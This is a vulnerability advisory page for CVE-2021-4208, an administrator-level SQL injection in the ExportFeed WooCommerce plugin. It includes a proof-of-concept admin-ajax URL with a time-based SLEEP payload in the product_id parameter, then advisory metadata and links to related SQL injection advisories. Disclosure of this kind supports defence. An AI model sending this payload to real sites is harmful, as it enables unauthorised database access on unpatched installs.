ExportFeed <= 2.0.1.0 – Admin+ SQL Injection | CVE 2021-4208 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the product_id POST parameter before using it in a SQL statement, leading to a SQL injection vulnerability exploitable by high privilege users

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?feedpath=core/ajax/wp/fetch_product_ajax.php&action=ebcpf_ebayseller_handles&security=1c6e01b2a4&category=&sku=snake&merchat_type=eBaySeller&service_name=eBaySeller&showOutofStock=1&limit=0,&q=savep&local_cat_ids=1&product_id=1+AND+(SELECT+9979+FROM+(SELECT(SLEEP(5)))IHgj)

Affects Plugins

exportfeed-list-woocommerce-products-on-ebay-store

No known fix

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

0xdecafbad

Submitter

0xdecafbad

Verified

Yes

WPVDB ID

0cf63b44-f709-4ba4-be14-1eea934c2007

Timeline

Publicly Published

2021-11-22 (about 4 years ago)

Added

2022-01-21 (about 3 years ago)

Last Updated

2022-04-12 (about 3 years ago)

Other

Published

Title

Published

2024-08-07

Title

Cost Calculator Builder < 3.2.16 - Unauthenticated SQL Injection

Published

2025-08-25

Title

Vibes < 2.2.1 - Unauthenticated SQL Injection via `resource` Parameter

Published

2023-12-27

Title

WebinarIgnition < 3.05.1 - Unauthenticated SQL Injection

Published

2024-12-02

Title

NEX-Forms – Ultimate Form Builder < 8.7.9 - Authenticated (Administrator+) SQL Injection

Published

2023-05-22

Title

Integration for Contact Form 7 and Zoho CRM, Bigin < 1.2.4 - Admin+ SQLi